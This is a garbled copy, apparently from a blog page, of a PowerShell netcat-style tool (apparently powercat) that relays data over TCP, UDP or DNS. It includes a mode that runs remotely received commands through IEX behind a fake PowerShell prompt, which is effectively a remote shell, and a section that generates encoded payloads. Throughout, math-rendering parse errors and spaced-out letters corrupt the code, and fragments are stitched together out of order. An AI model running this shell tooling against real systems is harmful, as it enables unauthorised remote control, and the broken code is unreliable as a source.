return KaTeX parse error: Expected 'EOF', got '}' at position 12: FuncVars }̲ function Clo…FuncVars)
$FuncVars[“Process”] | Stop-Process
########## CMD FUNCTIONS ##########

########## POWERSHELL FUNCTIONS ##########
function Main_Powershell
e n c o d i n g = N e w − O b j e c t S y s t e m . T e x t . A s c i i E n c o d i n g [ b y t e [ ] ] encoding = New-Object System.Text.AsciiEncoding [byte[]] encoding=NewObjectSystem.Text.AsciiEncoding[byte[]]InputToWrite = @()
if($i -ne $null)
Write-Verbose “Input from -i detected…”
if(Test-Path KaTeX parse error: Expected '}', got 'EOF' at end of input: i){ [byte[]]InputToWrite = ([io.file]::ReadAllBytes(KaTeX parse error: Expected 'EOF', got '}' at position 5: i)) }̲ elseif…i.GetType().Name -eq “Byte[]”){ [byte[]]$InputToWrite = KaTeX parse error: Expected 'EOF', got '}' at position 3: i }̲ elseif…i.GetType().Name -eq “String”){ [byte[]]$InputToWrite = E n c o d i n g . G e t B y t e s ( Encoding.GetBytes( Encoding.GetBytes(i) }
else{Write-Host “Unrecognised input type.” ; return}

  Write-Verbose "Setting up Stream 1... (ESC/CTRL to exit)"
  try{$Stream1Vars = Stream1_Setup $Stream1SetupVars}
  catch{Write-Verbose "Stream 1 Setup Failure" ; return}

  Write-Verbose "Setting up Stream 2... (ESC/CTRL to exit)"
    $IntroPrompt = $Encoding.GetBytes("Windows PowerShell`nCopyright (C) 2013 Microsoft Corporation. All rights reserved.`n`n" + ("PS " + (pwd).Path + "> "))
    $Prompt = ("PS " + (pwd).Path + "> ")
    $CommandToExecute = ""
    $Data = $null
    Write-Verbose "Stream 2 Setup Failure" ; return

  if($InputToWrite -ne @())
    Write-Verbose "Writing input to Stream 1..."
    try{$Stream1Vars = Stream1_WriteData $InputToWrite $Stream1Vars}
    catch{Write-Host "Failed to write input to Stream 1" ; return}

  if($d){Write-Verbose "-d (disconnect) Activated. Disconnecting..." ; return}

  Write-Verbose "Both Communication Streams Established. Redirecting Data Between Streams..."
      ##### Stream2 Read #####
      $Prompt = $null
      $ReturnedData = $null
      if($CommandToExecute -ne "")
        try{[byte[]]$ReturnedData = $Encoding.GetBytes((IEX $CommandToExecute 2>&1 | Out-String))}
        catch{[byte[]]$ReturnedData = $Encoding.GetBytes(($_ | Out-String))}
        $Prompt = $Encoding.GetBytes(("PS " + (pwd).Path + "> "))
      $Data += $IntroPrompt
      $IntroPrompt = $null
      $Data += $ReturnedData
      $Data += $Prompt
      $CommandToExecute = ""
      ##### Stream2 Read #####

      if($Data -ne $null){$Stream1Vars = Stream1_WriteData $Data $Stream1Vars}
      $Data = $null
      Write-Verbose "Failed to redirect data from Stream 2 to Stream 1" ; return

      $Data,$Stream1Vars = Stream1_ReadData $Stream1Vars
      if($Data.Length -eq 0){Start-Sleep -Milliseconds 100}
      if($Data -ne $null){$CommandToExecute = $Encoding.GetString($Data)}
      $Data = $null
      Write-Verbose "Failed to redirect data from Stream 1 to Stream 2" ; return
    Write-Verbose "Closing Stream 1..."
    Stream1_Close $Stream1Vars
    Write-Verbose "Failed to close Stream 1"

########## POWERSHELL FUNCTIONS ##########

########## CONSOLE FUNCTIONS ##########
function Setup_Console
$FuncVars = @{}
$FuncVars[“Encoding”] = New-Object System.Text.AsciiEncoding
$FuncVars[“Output”] = $FuncSetupVars[0]
$FuncVars[“OutputBytes”] = [byte[]]@()
$FuncVars[“OutputString”] = “”
return KaTeX parse error: Expected 'EOF', got '}' at position 12: FuncVars }̲ function Rea…FuncVars)
$Data = n u l l i f ( null if( nullif(Host.UI.RawUI.KeyAvailable)
$Data = $FuncVars[“Encoding”].GetBytes((Read-Host) + “`n”)
return D a t a , Data, Data,FuncVars
function WriteData_Console
param( D a t a , Data, Data,FuncVars)
“Host” {Write-Host -n F u n c V a r s [ " E n c o d i n g " ] . G e t S t r i n g ( FuncVars["Encoding"].GetString( FuncVars["Encoding"].GetString(Data)}
“String” {$FuncVars[“OutputString”] += F u n c V a r s [ " E n c o d i n g " ] . G e t S t r i n g ( FuncVars["Encoding"].GetString( FuncVars["Encoding"].GetString(Data)}
“Bytes” {$FuncVars[“OutputBytes”] += $Data}
return KaTeX parse error: Expected 'EOF', got '}' at position 12: FuncVars }̲ function Clo…FuncVars)
if($FuncVars[“OutputString”] -ne “”){return KaTeX parse error: Expected 'EOF', got '}' at position 25: …"OutputString"]}̲ elseif(FuncVars[“OutputBytes”] -ne @()){return $FuncVars[“OutputBytes”]}
########## CONSOLE FUNCTIONS ##########

########## MAIN FUNCTION ##########
function Main
param( S t r e a m 1 S e t u p V a r s , Stream1SetupVars, Stream1SetupVars,Stream2SetupVars)
[byte[]]$InputToWrite = @()
E n c o d i n g = N e w − O b j e c t S y s t e m . T e x t . A s c i i E n c o d i n g i f ( Encoding = New-Object System.Text.AsciiEncoding if( Encoding=NewObjectSystem.Text.AsciiEncodingif(i -ne $null)
Write-Verbose “Input from -i detected…”
if(Test-Path KaTeX parse error: Expected '}', got 'EOF' at end of input: i){ [byte[]]InputToWrite = ([io.file]::ReadAllBytes(KaTeX parse error: Expected 'EOF', got '}' at position 5: i)) }̲ elseif…i.GetType().Name -eq “Byte[]”){ [byte[]]$InputToWrite = KaTeX parse error: Expected 'EOF', got '}' at position 3: i }̲ elseif…i.GetType().Name -eq “String”){ [byte[]]$InputToWrite = E n c o d i n g . G e t B y t e s ( Encoding.GetBytes( Encoding.GetBytes(i) }
else{Write-Host “Unrecognised input type.” ; return}

  Write-Verbose "Setting up Stream 1..."
  try{$Stream1Vars = Stream1_Setup $Stream1SetupVars}
  catch{Write-Verbose "Stream 1 Setup Failure" ; return}

  Write-Verbose "Setting up Stream 2..."
  try{$Stream2Vars = Stream2_Setup $Stream2SetupVars}
  catch{Write-Verbose "Stream 2 Setup Failure" ; return}

  $Data = $null

  if($InputToWrite -ne @())
    Write-Verbose "Writing input to Stream 1..."
    try{$Stream1Vars = Stream1_WriteData $InputToWrite $Stream1Vars}
    catch{Write-Host "Failed to write input to Stream 1" ; return}

  if($d){Write-Verbose "-d (disconnect) Activated. Disconnecting..." ; return}

  Write-Verbose "Both Communication Streams Established. Redirecting Data Between Streams..."
      $Data,$Stream2Vars = Stream2_ReadData $Stream2Vars
      if(($Data.Length -eq 0) -or ($Data -eq $null)){Start-Sleep -Milliseconds 100}
      if($Data -ne $null){$Stream1Vars = Stream1_WriteData $Data $Stream1Vars}
      $Data = $null
      Write-Verbose "Failed to redirect data from Stream 2 to Stream 1" ; return

      $Data,$Stream1Vars = Stream1_ReadData $Stream1Vars
      if(($Data.Length -eq 0) -or ($Data -eq $null)){Start-Sleep -Milliseconds 100}
      if($Data -ne $null){$Stream2Vars = Stream2_WriteData $Data $Stream2Vars}
      $Data = $null
      Write-Verbose "Failed to redirect data from Stream 1 to Stream 2" ; return
    #Write-Verbose "Closing Stream 2..."
    Stream2_Close $Stream2Vars
    Write-Verbose "Failed to close Stream 2"
    #Write-Verbose "Closing Stream 1..."
    Stream1_Close $Stream1Vars
    Write-Verbose "Failed to close Stream 1"

########## MAIN FUNCTION ##########

########## GENERATE PAYLOAD ##########
Write-Verbose “Set Stream 1: UDP”
$FunctionString = (“function Stream1_Setupn{n” + ${function:Setup_UDP} + “n}nn") $FunctionString += ("function Stream1_ReadDatan{n" + ${function:ReadData_UDP} + "n}nn”)
$FunctionString += (“function Stream1_WriteDatan{n” + ${function:WriteData_UDP} + “n}nn") $FunctionString += ("function Stream1_Closen{n" + ${function:Close_UDP} + "n}nn”)
if(KaTeX parse error: Expected '}', got 'EOF' at end of input: l){InvokeString = "Main @(’’,$True,'$p','$t') "} else{$InvokeString = "Main @('$c', F a l s e , ′ False,' False,p’,‘KaTeX parse error: Expected 'EOF', got '}' at position 6: t') "}̲ } elseif(dns -ne “”)
Write-Verbose “Set Stream 1: DNS”
$FunctionString = (“function Stream1_Setupn{n” + ${function:Setup_DNS} + “n}nn") $FunctionString += ("function Stream1_ReadDatan{n" + ${function:ReadData_DNS} + "n}nn”)
$FunctionString += (“function Stream1_WriteDatan{n” + ${function:WriteData_DNS} + “n}nn") $FunctionString += ("function Stream1_Closen{n" + ${function:Close_DNS} + "n}nn”)
if(KaTeX parse error: Expected '}', got 'EOF' at end of input: …le."} else{InvokeString = "Main @(‘ c ′ , ′ c',' c,p’,‘ d n s ′ , dns', dns,dnsft) "}
Write-Verbose “Set Stream 1: TCP”
$FunctionString = (“function Stream1_Setupn{n” + ${function:Setup_TCP} + “n}nn") $FunctionString += ("function Stream1_ReadDatan{n" + ${function:ReadData_TCP} + "n}nn”)
$FunctionString += (“function Stream1_WriteDatan{n” + ${function:WriteData_TCP} + “n}nn") $FunctionString += ("function Stream1_Closen{n" + ${function:Close_TCP} + "n}nn”)
if(KaTeX parse error: Expected '}', got 'EOF' at end of input: l){InvokeString = "Main @(’’,$True,$p,$t) "} else{$InvokeString = "Main @('$c', F a l s e , False, False,p,$t) "}

if($e -ne “”)
Write-Verbose “Set Stream 2: Process”
$FunctionString += (“function Stream2_Setupn{n” + ${function:Setup_CMD} + “n}nn") $FunctionString += ("function Stream2_ReadDatan{n" + ${function:ReadData_CMD} + "n}nn”)
$FunctionString += (“function Stream2_WriteDatan{n” + ${function:WriteData_CMD} + “n}nn") $FunctionString += ("function Stream2_Closen{n" + ${function:Close_CMD} + "n}nn”)
I n v o k e S t r i n g + = " @ ( ′ InvokeString += "@(' InvokeString+="@(e’)nn"
Write-Verbose “Set Stream 2: Powershell”
KaTeX parse error: Expected 'EOF', got '}' at position 26: …ng += "`n`n" }̲ elseif(r -ne “”)
if($r.split("😊[0].ToLower() -eq “udp”)
Write-Verbose “Set Stream 2: UDP”
$FunctionString += (“function Stream2_Setupn{n” + ${function:Setup_UDP} + “n}nn") $FunctionString += ("function Stream2_ReadDatan{n" + ${function:ReadData_UDP} + "n}nn”)
$FunctionString += (“function Stream2_WriteDatan{n” + ${function:WriteData_UDP} + “n}nn") $FunctionString += ("function Stream2_Closen{n" + ${function:Close_UDP} + "n}nn”)
if(KaTeX parse error: Expected '}', got 'EOF' at end of input: …).Count -eq 2){InvokeString += ("@(’’,$True,'" + $r.split(":")[1] + "','$t') ")} elseif($r.split(":").Count -eq 3){$InvokeString += ("@('" + $r.split(":")[1] + "',$False,’" + r . s p l i t ( " : " ) [ 2 ] + " ′ , ′ r.split(":")[2] + "',' r.split(":")[2]+",t’) “)}
else{return “Bad relay format.”}
if($r.split(”😊[0].ToLower() -eq “dns”)
Write-Verbose “Set Stream 2: DNS”
$FunctionString += (“function Stream2_Setupn{n” + ${function:Setup_DNS} + “n}nn") $FunctionString += ("function Stream2_ReadDatan{n" + ${function:ReadData_DNS} + "n}nn”)
$FunctionString += (“function Stream2_WriteDatan{n” + ${function:WriteData_DNS} + “n}nn") $FunctionString += ("function Stream2_Closen{n" + ${function:Close_DNS} + "n}nn”)
if( r . s p l i t ( " : " ) . C o u n t − e q 2 ) r e t u r n " T h i s f e a t u r e i s n o t a v a i l a b l e . " e l s e i f ( r.split(":").Count -eq 2){return "This feature is not available."} elseif( r.split(":").Counteq2)return"Thisfeatureisnotavailable."elseif(r.split("😊.Count -eq 4){$InvokeString += ("@(’" + $r.split("😊[1] + “’,’” + $r.split("😊[2] + “’,’” + r . s p l i t ( " : " ) [ 3 ] + " ′ , r.split(":")[3] + "', r.split(":")[3]+",dnsft) “)}
else{return “Bad relay format.”}
elseif($r.split(”😊[0].ToLower() -eq “tcp”)
Write-Verbose “Set Stream 2: TCP”
$FunctionString += (“function Stream2_Setupn{n” + ${function:Setup_TCP} + “n}nn") $FunctionString += ("function Stream2_ReadDatan{n" + ${function:ReadData_TCP} + "n}nn”)
$FunctionString += (“function Stream2_WriteDatan{n” + ${function:WriteData_TCP} + “n}nn") $FunctionString += ("function Stream2_Closen{n" + ${function:Close_TCP} + "n}nn”)
if(KaTeX parse error: Expected '}', got 'EOF' at end of input: …).Count -eq 2){InvokeString += ("@(’’,$True,'" + $r.split(":")[1] + "','$t') ")} elseif($r.split(":").Count -eq 3){$InvokeString += ("@('" + $r.split(":")[1] + "',$False,’" + r . s p l i t ( " : " ) [ 2 ] + " ′ , ′ r.split(":")[2] + "',' r.split(":")[2]+",t’) “)}
else{return “Bad relay format.”}
Write-Verbose “Set Stream 2: Console”
$FunctionString += (“function Stream2_Setupn{n” + ${function:Setup_Console} + “n}nn") $FunctionString += ("function Stream2_ReadDatan{n" + ${function:ReadData_Console} + "n}nn”)
$FunctionString += (“function Stream2_WriteDatan{n” + ${function:WriteData_Console} + “n}nn") $FunctionString += ("function Stream2_Closen{n" + ${function:Close_Console} + "n}nn”)
$InvokeString += (”@(’" + $o + “’)”)

if(KaTeX parse error: Expected '}', got 'EOF' at end of input: ep){FunctionString += (“function Mainn{n” + KaTeX parse error: Expected 'EOF', got '}' at position 33: …wershell} + "`n}̲`n`n")} else{FunctionString += (“function Mainn{n” + ${function:Main} + “n}n`n”)}
I n v o k e S t r i n g = ( InvokeString = ( InvokeString=(FunctionString + $InvokeString)
########## GENERATE PAYLOAD ##########

########## RETURN GENERATED PAYLOADS ##########
if(KaTeX parse error: Expected '}', got 'EOF' at end of input: …icode.GetBytes(InvokeString))}
elseif($g){Write-Verbose “Returning Payload…” ; return $InvokeString}
########## RETURN GENERATED PAYLOADS ##########

########## EXECUTION ##########
$Output = KaTeX parse error: Expected '}', got 'EOF' at end of input: …try { if(rep)
$Output += IEX $InvokeString
Start-Sleep -s 2
Write-Verbose “Repetition Enabled: Restarting…”
$Output += IEX KaTeX parse error: Expected 'EOF', got '}' at position 18: …vokeString }̲ } finally …Output -ne KaTeX parse error: Expected '}', got 'EOF' at end of input: … { if(of -eq “”){KaTeX parse error: Expected 'EOF', got '}' at position 7: Output}̲ else{[io…of,$Output)}
########## EXECUTION ##########





当前余额3.43前往充值 >
领取后你会自动成为博主和红包主的粉丝 规则
钱包余额 0


